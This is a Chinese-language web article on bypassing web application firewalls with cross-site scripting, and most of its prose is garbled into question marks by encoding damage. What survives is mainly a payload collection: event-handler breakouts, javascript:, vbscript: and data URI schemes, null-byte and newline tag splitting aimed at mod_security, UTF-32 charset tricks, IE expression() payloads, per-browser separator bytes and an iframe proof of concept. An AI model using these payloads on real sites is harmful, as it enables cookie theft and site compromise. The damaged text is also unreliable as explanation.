XSS???WAF??????????????
???????????? ???????[ 2014/7/2 15:42:34 ] ??????????????? ???????
??????????????
????<input value="XSStest" type=text>
?????????????? “><imgsrc=x onerror=prompt(0);>?????????????<>?????????????????????“ autofocusonfocus=alert(1)//???????????????“ ???value?????????????????н??
????" onmouseover="prompt(0) x="
????" onfocusin=alert(1) autofocus x="
????" onfocusout=alert(1) autofocus x="
????" onblur=alert(1) autofocus a="
????????????<script>?????
?????????????????
????<script>
????Var
????x=”Input”;
????</script>
????????????????“></script>?????????</script>?????????????????????????????????????н??alert()?? prompt()
????confirm() ?????磺
????“;alert(1)//
????????????????
????DOMfocusin??DOMfocusout???????????Щ??????????????????????С????磺
????";document.body.addEventListener("DOMActivate"??alert(1))//
????";document.body.addEventListener("DOMActivate"??prompt(1))//
????";document.body.addEventListener("DOMActivate"??confirm(1))//
??????????????б?
DOMAttrModified
DOMCharacterDataModified
DOMFocusIn
DOMFocusOut
DOMMouseScroll
DOMNodeInserted
DOMNodeInsertedIntoDocument
DOMNodeRemoved
DOMNodeRemovedFromDocument
DOMSubtreeModified
|
?????????????
?????????е????????
????<a
????href=”Userinput”>Click</a>
???????????javascript:alert(1)//??????<a
????href=”javascript:alert(1)//”>Click</a>
????????
?????????????Сд??
????JavaScript????
????javascript:alert(1)
????javaSCRIPT:alert(1)
????JaVaScRipT:alert(1)
????javas	cript:u0061lert(1);
????javascript:u0061lert(1)
????javascript:alert(document.cookie) // AsharJaved
????IE10???o?URI?п??????VBScript
????vbscript:alert(1);
????vbscript:alert(1);
????vbscr	ipt:alert(1)"
????Data URl
????data:text/html;base64??PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
????JSON????
????????????
????encodeURIComponent('userinput')
???????????
????-alert(1)-
????-prompt(1)-
????-confirm(1)-
???????
????encodeURIComponent(''-alert(1)-'')
????encodeURIComponent(''-prompt(1)-'')
????????????svg?????
??????????£?
????<svg><script>varmyvar=”YourInput”;</script></svg>
????????????
????www.site.com/test.php?var=text”;alert(1)//
???????????????”???
????<svg><script>varmyvar="text";alert(1)//";</script></svg>
????????????????????XML????HTML?????????????2?α?????
?????????BUG
?????????BUG
?????????BUG??IE?к???飬???bug??UTF-7?????????????????????????????99% ??WAF?????
???????
????http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS
????????????????
????http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=”><img
????src=x onerror=prompt(0);>
????????????UTF-32???????
???????script?alert(1)?/script?
????http://xsst.sinaapp.com/utf-32-1.php?charset=utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80
?????????
?????????????mod_security?????????????£?
????<scri%00pt>alert(1);</scri%00pt>
????<scrix00pt>alert(1);</scri%00pt>
????<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
????????????????PHP 5.3.8?????汾
??????BUG
????RFC?????н????????????????μ??????javascript?в???????
????<script>alert(1);</script>
????<%0ascript>alert(1);</script>
????<%0bscript>alert(1);</script>
????<%?? <//?? <!??<????????????<???????????????μ?payload
????<// style=x:expression28write(1)29> // Works upto IE7
?????ο?http://html5sec.org/#71
????<!--[if]><script>alert(1)</script --> // Works upto IE9
?????ο?http://html5sec.org/#115
????<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/> // Works in IE7
?????ο? http://html5sec.org/#77
????<%div%20style=xss:expression(prompt(1))> // Works Upto IE7
????Unicode????
????[onw+s*]????????????????on???????????????????????Ч??????????????fuzzing????????0×00??0xff????????£?
????IExplorer= [0x09??0x0B??0x0C??0x20??0x3B]
????Chrome = [0x09??0x20??0x28??0x2C??0x3B]
????Safari = [0x2C??0x3B]
????FireFox= [0x09??0x20??0x28??0x2C??0x3B]
????Opera = [0x09??0x20??0x2C??0x3B]
????Android = [0x09??0x20??0x28??0x2C??0x3B]
????x0b??Mod_security??????????????????????
????<a/onmouseover[x0b]=location='x6Ax61x76x61x73x63x72x69x70x74x3Ax61x6Cx65x72x74x28x30x29x3B'>rhainfosec
???????X-frame???
????????????X-frame????????????????????????????????????iframe?????xss???
????Docmodes
????IE??????doc-mode????????????汾????????????????з????????????????????????????????????????doc-mode???css????
????expression(open(alert(1)))
????????POC???????IE7??
????<html>
????<body>
????<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
????<iframesrc="https://targetwebsite.com">
????</body>
????</html>
??????

???·???
??????????????????
2023/3/23 14:23:39???д?ò??????????
2023/3/22 16:17:39????????????????????Щ??
2022/6/14 16:14:27??????????????????????????
2021/10/18 15:37:44???????????????
2021/9/17 15:19:29???·???????·
2021/9/14 15:42:25?????????????
2021/5/28 17:25:47??????APP??????????
2021/5/8 17:01:11